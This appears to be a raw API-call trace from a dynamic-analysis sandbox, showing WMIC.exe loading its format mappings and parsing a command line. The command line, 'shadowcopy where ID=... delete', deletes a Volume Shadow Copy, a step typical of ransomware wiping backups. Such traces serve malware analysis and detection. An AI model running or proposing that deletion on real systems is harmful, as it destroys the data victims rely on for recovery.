[0122.872] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0122.872] malloc (_Size=0x30) returned 0x568000 [0122.872] malloc (_Size=0x18) returned 0x566de0 [0122.873] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0122.873] SysStringLen (param_1="DEFAULT") returned 0x7 [0122.873] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0122.873] SysStringLen (param_1="PKT") returned 0x3 [0122.873] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0122.873] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0122.873] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0122.873] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0122.873] malloc (_Size=0x30) returned 0x568040 [0122.873] malloc (_Size=0x40) returned 0x566e00 [0122.873] malloc (_Size=0x20a) returned 0x566e50 [0122.873] GetSystemDirectoryW (in: lpBuffer=0x566e50, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0122.873] free (_Block=0x566e50) [0122.873] malloc (_Size=0x18) returned 0x566e50 [0122.873] malloc (_Size=0x18) returned 0x566e70 [0122.873] malloc (_Size=0x18) returned 0x566e90 [0122.873] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0122.873] SysStringLen (param_1="\\wbem\\") returned 0x6 [0122.873] free (_Block=0x566e50) [0122.873] free (_Block=0x566e70) [0122.874] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0122.874] free (_Block=0x566e90) [0122.874] malloc (_Size=0x18) returned 0x566e50 [0122.874] malloc (_Size=0x18) returned 0x566e70 [0122.874] malloc (_Size=0x18) returned 0x566e90 [0122.874] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0122.874] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0122.874] free (_Block=0x566e50) [0122.874] free (_Block=0x566e70) [0122.874] GetCurrentThreadId () returned 0xaa8 [0122.874] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x22f500 | out: phkResult=0x22f500*=0xf8) returned 0x0 [0122.874] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x22f550, lpcbData=0x22f4f0*=0x400 | out: lpType=0x0, lpData=0x22f550*=0x30, lpcbData=0x22f4f0*=0x4) returned 0x0 [0122.874] _wcsicmp (_String1="0", _String2="1") returned -1 [0122.874] _wcsicmp (_String1="0", _String2="2") returned -2 [0122.874] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x22f4f0*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x22f4f0*=0x42) returned 0x0 [0122.875] malloc (_Size=0x86) returned 0x566eb0 [0122.875] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x566eb0, lpcbData=0x22f4f0*=0x42 | out: lpType=0x0, lpData=0x566eb0*=0x25, lpcbData=0x22f4f0*=0x42) returned 0x0 [0122.875] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0122.875] malloc (_Size=0x42) returned 0x566f40 [0122.875] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0122.875] RegQueryValueExW (in: hKey=0xf8, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x22f550, lpcbData=0x22f4f0*=0x400 | out: lpType=0x0, lpData=0x22f550*=0x36, lpcbData=0x22f4f0*=0xc) returned 0x0 [0122.875] _wtol (_String="65536") returned 65536 [0122.875] free (_Block=0x566eb0) [0122.875] RegCloseKey (hKey=0x0) returned 0x6 [0122.875] CoCreateInstance (in: rclsid=0xff887410*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff8873f0*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x22f9f8 | out: ppv=0x22f9f8*=0x24571d0) returned 0x0 [0122.895] FreeThreadedDOMDocument:IXMLDOMDocument:Load (in: This=0x24571d0, xmlSource=0x22fb40*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x566e50), isSuccessful=0x22fbb0 | out: isSuccessful=0x22fbb0*=0xffff) returned 0x0 [0123.019] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x24571d0, DOMElement=0x22f9f0 | out: DOMElement=0x22f9f0) returned 0x0 [0123.019] malloc (_Size=0x18) returned 0x566e50 [0123.020] free (_Block=0x566e50) [0123.020] malloc (_Size=0x18) returned 0x566e50 [0123.020] free (_Block=0x566e50) [0123.020] malloc (_Size=0x18) returned 0x566e50 [0123.020] malloc (_Size=0x18) returned 0x566e70 [0123.021] malloc (_Size=0x30) returned 0x568080 [0123.021] malloc (_Size=0x18) returned 0x566eb0 [0123.021] free (_Block=0x566eb0) [0123.021] malloc (_Size=0x18) returned 0x56c560 [0123.021] malloc (_Size=0x18) returned 0x56c580 [0123.021] SysStringLen (param_1="VALUE") returned 0x5 [0123.021] SysStringLen (param_1="TABLE") returned 0x5 [0123.021] SysStringLen (param_1="TABLE") returned 0x5 [0123.021] SysStringLen (param_1="VALUE") returned 0x5 [0123.021] malloc (_Size=0x30) returned 0x5680c0 [0123.022] malloc (_Size=0x18) returned 0x56c5a0 [0123.022] free (_Block=0x56c5a0) [0123.022] malloc (_Size=0x18) returned 0x56c5a0 [0123.022] malloc (_Size=0x18) returned 0x56c5c0 [0123.022] SysStringLen (param_1="LIST") returned 0x4 [0123.022] SysStringLen (param_1="TABLE") returned 0x5 [0123.022] malloc (_Size=0x30) returned 0x568100 [0123.022] malloc (_Size=0x18) returned 0x56c5e0 [0123.022] free (_Block=0x56c5e0) [0123.023] malloc (_Size=0x18) returned 0x56c5e0 [0123.023] malloc (_Size=0x18) returned 0x56c600 [0123.023] SysStringLen (param_1="RAWXML") returned 0x6 [0123.023] SysStringLen (param_1="TABLE") returned 0x5 [0123.023] SysStringLen (param_1="RAWXML") returned 0x6 [0123.023] SysStringLen (param_1="LIST") returned 0x4 [0123.023] SysStringLen (param_1="LIST") returned 0x4 [0123.023] SysStringLen (param_1="RAWXML") returned 0x6 [0123.023] malloc (_Size=0x30) returned 0x568140 [0123.023] malloc (_Size=0x18) returned 0x56c620 [0123.023] free (_Block=0x56c620) [0123.023] malloc (_Size=0x18) returned 0x56c620 [0123.024] malloc (_Size=0x18) returned 0x56c640 [0123.024] SysStringLen (param_1="HTABLE") returned 0x6 [0123.024] SysStringLen (param_1="TABLE") returned 0x5 [0123.024] SysStringLen (param_1="HTABLE") returned 0x6 [0123.024] SysStringLen (param_1="LIST") returned 0x4 [0123.024] malloc (_Size=0x30) returned 0x568180 [0123.024] malloc (_Size=0x18) returned 0x56c660 [0123.024] free (_Block=0x56c660) [0123.024] malloc (_Size=0x18) returned 0x56c660 [0123.024] malloc (_Size=0x18) returned 0x56c680 [0123.024] SysStringLen (param_1="HFORM") returned 0x5 [0123.024] SysStringLen (param_1="TABLE") returned 0x5 [0123.025] SysStringLen (param_1="HFORM") returned 0x5 [0123.025] SysStringLen (param_1="LIST") returned 0x4 [0123.025] SysStringLen (param_1="HFORM") returned 0x5 [0123.025] SysStringLen (param_1="HTABLE") returned 0x6 [0123.025] malloc (_Size=0x30) returned 0x5681c0 [0123.025] malloc (_Size=0x18) returned 0x56c6a0 [0123.025] free (_Block=0x56c6a0) [0123.025] malloc (_Size=0x18) returned 0x56c6a0 [0123.025] malloc (_Size=0x18) returned 0x56c6c0 [0123.025] SysStringLen (param_1="XML") returned 0x3 [0123.025] SysStringLen (param_1="TABLE") returned 0x5 [0123.025] SysStringLen (param_1="XML") returned 0x3 [0123.025] SysStringLen (param_1="VALUE") returned 0x5 [0123.025] SysStringLen (param_1="VALUE") returned 0x5 [0123.026] SysStringLen (param_1="XML") returned 0x3 [0123.026] malloc (_Size=0x30) returned 0x568200 [0123.026] malloc (_Size=0x18) returned 0x56c6e0 [0123.026] free (_Block=0x56c6e0) [0123.026] malloc (_Size=0x18) returned 0x56c6e0 [0123.026] malloc (_Size=0x18) returned 0x56c700 [0123.026] SysStringLen (param_1="MOF") returned 0x3 [0123.026] SysStringLen (param_1="TABLE") returned 0x5 [0123.026] SysStringLen (param_1="MOF") returned 0x3 [0123.026] SysStringLen (param_1="LIST") returned 0x4 [0123.026] SysStringLen (param_1="MOF") returned 0x3 [0123.026] SysStringLen (param_1="RAWXML") returned 0x6 [0123.026] SysStringLen (param_1="LIST") returned 0x4 [0123.026] SysStringLen (param_1="MOF") returned 0x3 [0123.027] malloc (_Size=0x30) returned 0x568240 [0123.027] malloc (_Size=0x18) returned 0x56c720 [0123.027] free (_Block=0x56c720) [0123.027] malloc (_Size=0x18) returned 0x56c720 [0123.027] malloc (_Size=0x18) returned 0x56c740 [0123.027] SysStringLen (param_1="CSV") returned 0x3 [0123.027] SysStringLen (param_1="TABLE") returned 0x5 [0123.027] SysStringLen (param_1="CSV") returned 0x3 [0123.027] SysStringLen (param_1="LIST") returned 0x4 [0123.027] SysStringLen (param_1="CSV") returned 0x3 [0123.027] SysStringLen (param_1="HTABLE") returned 0x6 [0123.027] SysStringLen (param_1="CSV") returned 0x3 [0123.027] SysStringLen (param_1="HFORM") returned 0x5 [0123.027] malloc (_Size=0x30) returned 0x568280 [0123.028] malloc (_Size=0x18) returned 0x56c760 [0123.028] free (_Block=0x56c760) [0123.028] malloc (_Size=0x18) returned 0x56c760 [0123.028] malloc (_Size=0x18) returned 0x56c780 [0123.028] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0123.028] SysStringLen (param_1="TABLE") returned 0x5 [0123.028] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0123.028] SysStringLen (param_1="VALUE") returned 0x5 [0123.028] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0123.028] SysStringLen (param_1="XML") returned 0x3 [0123.028] SysStringLen (param_1="XML") returned 0x3 [0123.028] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0123.028] malloc (_Size=0x30) returned 0x5682c0 [0123.029] malloc (_Size=0x18) returned 0x56c7a0 [0123.029] free (_Block=0x56c7a0) [0123.029] malloc (_Size=0x18) returned 0x56c7a0 [0123.029] malloc (_Size=0x18) returned 0x56c7c0 [0123.029] SysStringLen (param_1="texttablewsys") returned 0xd [0123.029] SysStringLen (param_1="TABLE") returned 0x5 [0123.029] SysStringLen (param_1="texttablewsys") returned 0xd [0123.029] SysStringLen (param_1="XML") returned 0x3 [0123.029] SysStringLen (param_1="texttablewsys") returned 0xd [0123.029] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0123.029] SysStringLen (param_1="XML") returned 0x3 [0123.029] SysStringLen (param_1="texttablewsys") returned 0xd [0123.029] malloc (_Size=0x30) returned 0x568300 [0123.030] malloc (_Size=0x18) returned 0x56c7e0 [0123.030] free (_Block=0x56c7e0) [0123.030] malloc (_Size=0x18) returned 0x56c7e0 [0123.030] malloc (_Size=0x18) returned 0x56c800 [0123.030] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0123.030] SysStringLen (param_1="TABLE") returned 0x5 [0123.030] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0123.030] SysStringLen (param_1="XML") returned 0x3 [0123.030] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0123.030] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0123.030] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0123.030] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0123.030] malloc (_Size=0x30) returned 0x568340 [0123.030] malloc (_Size=0x18) returned 0x56c820 [0123.031] free (_Block=0x56c820) [0123.031] malloc (_Size=0x18) returned 0x56c820 [0123.031] malloc (_Size=0x18) returned 0x56c840 [0123.031] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0123.031] SysStringLen (param_1="TABLE") returned 0x5 [0123.031] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0123.031] SysStringLen (param_1="XML") returned 0x3 [0123.031] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0123.031] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0123.031] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0123.031] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0123.031] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0123.031] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0123.031] malloc (_Size=0x30) returned 0x568380 [0123.031] malloc (_Size=0x18) returned 0x56c860 [0123.032] free (_Block=0x56c860) [0123.032] malloc (_Size=0x18) returned 0x56c860 [0123.032] malloc (_Size=0x18) returned 0x56c880 [0123.032] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0123.032] SysStringLen (param_1="TABLE") returned 0x5 [0123.032] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0123.032] SysStringLen (param_1="XML") returned 0x3 [0123.032] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0123.032] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0123.032] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0123.032] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0123.032] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0123.032] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0123.032] malloc (_Size=0x30) returned 0x5683c0 [0123.032] malloc (_Size=0x18) returned 0x56c8a0 [0123.033] free (_Block=0x56c8a0) [0123.033] malloc (_Size=0x18) returned 0x56c8a0 [0123.033] malloc (_Size=0x18) returned 0x56c8c0 [0123.033] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0123.033] SysStringLen (param_1="TABLE") returned 0x5 [0123.033] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0123.033] SysStringLen (param_1="XML") returned 0x3 [0123.033] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0123.033] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0123.033] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0123.033] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0123.033] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0123.033] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0123.033] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0123.033] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0123.033] malloc (_Size=0x30) returned 0x568400 [0123.034] malloc (_Size=0x18) returned 0x56c8e0 [0123.034] free (_Block=0x56c8e0) [0123.034] malloc (_Size=0x18) returned 0x56c8e0 [0123.034] malloc (_Size=0x18) returned 0x56c900 [0123.034] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0123.034] SysStringLen (param_1="TABLE") returned 0x5 [0123.034] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0123.034] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0123.034] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0123.034] SysStringLen (param_1="XML") returned 0x3 [0123.034] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0123.034] SysStringLen (param_1="texttablewsys") returned 0xd [0123.034] SysStringLen (param_1="XML") returned 0x3 [0123.034] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0123.034] malloc (_Size=0x30) returned 0x568440 [0123.035] malloc (_Size=0x18) returned 0x56c920 [0123.035] free (_Block=0x56c920) [0123.035] malloc (_Size=0x18) returned 0x56c920 [0123.035] malloc (_Size=0x18) returned 0x56c940 [0123.035] SysStringLen (param_1="htable-sortby") returned 0xd [0123.035] SysStringLen (param_1="TABLE") returned 0x5 [0123.035] SysStringLen (param_1="htable-sortby") returned 0xd [0123.035] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0123.035] SysStringLen (param_1="htable-sortby") returned 0xd [0123.035] SysStringLen (param_1="XML") returned 0x3 [0123.035] SysStringLen (param_1="htable-sortby") returned 0xd [0123.035] SysStringLen (param_1="texttablewsys") returned 0xd [0123.035] SysStringLen (param_1="htable-sortby") returned 0xd [0123.035] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0123.035] SysStringLen (param_1="XML") returned 0x3 [0123.035] SysStringLen (param_1="htable-sortby") returned 0xd [0123.035] malloc (_Size=0x30) returned 0x568480 [0123.036] malloc (_Size=0x18) returned 0x56c960 [0123.036] free (_Block=0x56c960) [0123.036] malloc (_Size=0x18) returned 0x56c960 [0123.036] malloc (_Size=0x18) returned 0x56c980 [0123.036] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0123.036] SysStringLen (param_1="TABLE") returned 0x5 [0123.036] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0123.036] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0123.036] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0123.036] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0123.036] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0123.036] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0123.036] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0123.036] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0123.037] malloc (_Size=0x30) returned 0x5684c0 [0123.037] malloc (_Size=0x18) returned 0x56c9a0 [0123.037] free (_Block=0x56c9a0) [0123.037] malloc (_Size=0x18) returned 0x56c9a0 [0123.037] malloc (_Size=0x18) returned 0x56c9c0 [0123.037] SysStringLen (param_1="wmiclimofformat") returned 0xf [0123.037] SysStringLen (param_1="TABLE") returned 0x5 [0123.037] SysStringLen (param_1="wmiclimofformat") returned 0xf [0123.037] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0123.037] SysStringLen (param_1="wmiclimofformat") returned 0xf [0123.038] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0123.038] SysStringLen (param_1="wmiclimofformat") returned 0xf [0123.038] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0123.038] SysStringLen (param_1="wmiclimofformat") returned 0xf [0123.038] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0123.038] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0123.038] SysStringLen (param_1="wmiclimofformat") returned 0xf [0123.038] malloc (_Size=0x30) returned 0x568500 [0123.038] malloc (_Size=0x18) returned 0x56c9e0 [0123.038] free (_Block=0x56c9e0) [0123.038] malloc (_Size=0x18) returned 0x56c9e0 [0123.038] malloc (_Size=0x18) returned 0x56ca00 [0123.038] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0123.038] SysStringLen (param_1="TABLE") returned 0x5 [0123.038] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0123.038] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0123.038] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0123.039] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0123.039] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0123.039] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0123.039] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0123.039] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0123.039] malloc (_Size=0x30) returned 0x568540 [0123.039] malloc (_Size=0x18) returned 0x56ca20 [0123.039] free (_Block=0x56ca20) [0123.039] malloc (_Size=0x18) returned 0x56ca20 [0123.039] malloc (_Size=0x18) returned 0x56ca40 [0123.039] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0123.039] SysStringLen (param_1="TABLE") returned 0x5 [0123.039] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0123.039] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0123.039] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0123.039] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0123.040] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0123.040] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0123.040] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0123.040] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0123.040] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0123.040] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0123.040] malloc (_Size=0x30) returned 0x568580 [0123.040] FreeThreadedDOMDocument:IUnknown:Release (This=0x24571d0) returned 0x0 [0123.040] free (_Block=0x566e90) [0123.040] GetCommandLineW () returned="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}'\" delete" [0123.040] malloc (_Size=0xe0) returned 0x56cd30 [0123.040] memcpy_s (in: _Destination=0x56cd30, _DestinationSize=0xde, _Source=0x3325be, _SourceSize=0xd0 | out: _Destination=0x56cd30) returned 0x0 [0123.041] malloc (_Size=0x18) returned 0x56ca60 [0123.041] malloc (_Size=0x18) returned 0x56ca80 [0123.041] malloc (_Size=0x18) returned 0x56caa0 [0123.041] malloc (_Size=0x18) returned 0x56cac0 [0123.041] malloc (_Size=0x80) returned 0x566e90 [0123.041] GetLocalTime (in: lpSystemTime=0x22fb90 | out: lpSystemTime=0x22fb90*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x5, wDay=0x4, wHour=0x8, wMinute=0x37, wSecond=0x1b, wMilliseconds=0x15c)) [0123.041] _vsnwprintf (in: _Buffer=0x566e90, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x22fae8 | out: _Buffer="09-04-2020T08:55:27") returned 19 [0123.041] lstrlenW (lpString=" shadowcopy where \"ID='{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}'\" delete") returned 71 [0123.041] malloc (_Size=0x90) returned 0x5670a0 [0123.041] lstrlenW (lpString=" shadowcopy where \"ID='{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}'\" delete") returned 71 [0123.041] lstrlenW (lpString=" shadowcopy where \"ID='{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}'\" delete") returned 71 [0123.041] malloc (_Size=0x90) returned 0x56ce20 [0123.041] lstrlenW (lpString=" shadowcopy where \"ID='{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}'\" delete") returned 71 [0123.041] lstrlenW (lpString=" shadowcopy where \"ID='{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}'\" delete") returned 71 [0123.041] lstrlenW (lpString=" shadowcopy where \"ID='{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}'\" delete") returned 71 [0123.041] malloc (_Size=0x16) returned 0x56cae0 [0123.041] lstrlenW (lpString="shadowcopy") returned 10 [0123.041] _wcsicmp (_String1="shadowcopy", _String2="\"NULL\"") returned 81 [0123.041] malloc (_Size=0x16) returned 0x56cb00 [0123.041] malloc (_Size=0x8) returned 0x567140 [0123.041] free (_Block=0x0) [0123.042] free (_Block=0x56cae0) [0123.042] lstrlenW (lpString=" shadowcopy where \"ID='{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}'\" delete") returned 71 [0123.042] malloc (_Size=0xc) returned 0x56cae0 [0123.042] lstrlenW (lpString="where") returned 5 [0123.042] _wcsicmp (_String1="where", _String2="\"NULL\"") returned 85 [0123.042] malloc (_Size=0xc) returned 0x56cb20 [0123.042] malloc (_Size=0x10) returned 0x56cb40 [0123.042] memmove_s (in: _Destination=0x56cb40, _DestinationSize=0x8, _Source=0x567140, _SourceSize=0x8 | out: _Destination=0x56cb40) returned 0x0 [0123.042] free (_Block=0x567140) [0123.042] free (_Block=0x0) [0123.042] free (_Block=0x56cae0) [0123.042] lstrlenW (lpString=" shadowcopy where \"ID='{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}'\" delete") returned 71 [0123.042] malloc (_Size=0x5c) returned 0x56cec0 [0123.042] lstrlenW (lpString="\"ID='{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}'\"") returned 45 [0123.042] _wcsicmp (_String1="\"ID='{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}'\"", _String2="\"NULL\"") returned -5 [0123.042] lstrlenW (lpString="\"ID='{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}'\"") returned 45 [0123.042] lstrlenW (lpString="\"ID='{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}'\"") returned 45 [0123.042] malloc (_Size=0x5c) returned 0x56cf30 [0123.042] malloc (_Size=0x18) returned 0x56cae0 [0123.042] memmove_s (in: _Destination=0x56cae0, _DestinationSize=0x10, _Source=0x56cb40, _SourceSize=0x10 | out: _Destination=0x56cae0) returned 0x0 [0123.042] free (_Block=0x56cb40) [0123.042] free (_Block=0x0) [0123.042] free (_Block=0x56cec0) [0123.042] lstrlenW (lpString=" shadowcopy where \"ID='{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}'\" delete") returned 71 [0123.042] malloc (_Size=0xe) returned 0x56cb40 [0123.042] lstrlenW (lpString="delete") returned 6 [0123.042] _wcsicmp (_String1="delete", _String2="\"NULL\"") returned 66 [0123.043] malloc (_Size=0xe) returned 0x56cb60 [0123.043] malloc (_Size=0x20) returned 0x56cec0 [0123.043] memmove_s (in: _Destination=0x56cec0, _DestinationSize=0x18, _Source=0x56cae0, _SourceSize=0x18 | out: _Destination=0x56cec0) returned 0x0 [0123.043] free (_Block=0x56cae0) [0123.043] free (_Block=0x0) [0123.043] free (_Block=0x56cb40) [0123.043] malloc (_Size=0x20) returned 0x56cef0 [0123.043] lstrlenW (lpString="QUIT") returned 4 [0123.043] lstrlenW (lpString="shadowcopy") returned 10 [0123.043] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="QUIT", cchCount2=4) returned 3 [0123.043] lstrlenW (lpString="EXIT") returned 4 [0123.043] lstrlenW (lpString="shadowcopy") returned 10 [0123.043] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="EXIT", cchCount2=4) returned 3 [0123.043] free (_Block=0x56cef0) [0123.043] WbemLocator:IUnknown:AddRef (This=0x1f71390) returned 0x2 [0123.043] malloc (_Size=0x20) returned 0x56cef0 [0123.043] lstrlenW (lpString="/") returned 1 [0123.043] lstrlenW (lpString="shadowcopy") returned 10 [0123.043] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="/", cchCount2=1) returned 3 [0123.043] lstrlenW (lpString="-") returned 1 [0123.043] lstrlenW (lpString="shadowcopy") returned 10 [0123.043] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="-", cchCount2=1) returned 3 [0123.044] lstrlenW (lpString="CLASS") returned 5 [0123.044] lstrlenW (lpString="shadowcopy") returned 10 [0123.044] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CLASS", cchCount2=5) returned 3 [0123.044] lstrlenW (lpString="PATH") returned 4 [0123.044] lstrlenW (lpString="shadowcopy") returned 10 [0123.044] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="PATH", cchCount2=4) returned 3 [0123.044] lstrlenW (lpString="CONTEXT") returned 7 [0123.044] lstrlenW (lpString="shadowcopy") returned 10 [0123.044] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CONTEXT", cchCount2=7) returned 3 [0123.044] lstrlenW (lpString="shadowcopy") returned 10 [0123.044] malloc (_Size=0x16) returned 0x56cb40 [0123.044] lstrlenW (lpString="shadowcopy") returned 10 [0123.044] GetCurrentThreadId () returned 0xaa8 [0123.044] ??0CHString@@QEAA@XZ () returned 0x22f9a0 [0123.044] malloc (_Size=0x18) returned 0x56cae0 [0123.044] malloc (_Size=0x18) returned 0x56cb80 [0123.044] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1f71390, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff8f2998 | out: ppNamespace=0xff8f2998*=0x1f83a98) returned 0x0 [0123.066] free (_Block=0x56cb80) [0123.066] free (_Block=0x56cae0) [0123.066] CoSetProxyBlanket (pProxy=0x1f83a98, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0123.066] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0123.066] GetCurrentThreadId () returned 0xaa8 [0123.066] ??0CHString@@QEAA@XZ () returned 0x22f838 [0123.066] malloc (_Size=0x18) returned 0x56cae0 [0123.066] malloc (_Size=0x18) returned 0x56cb80 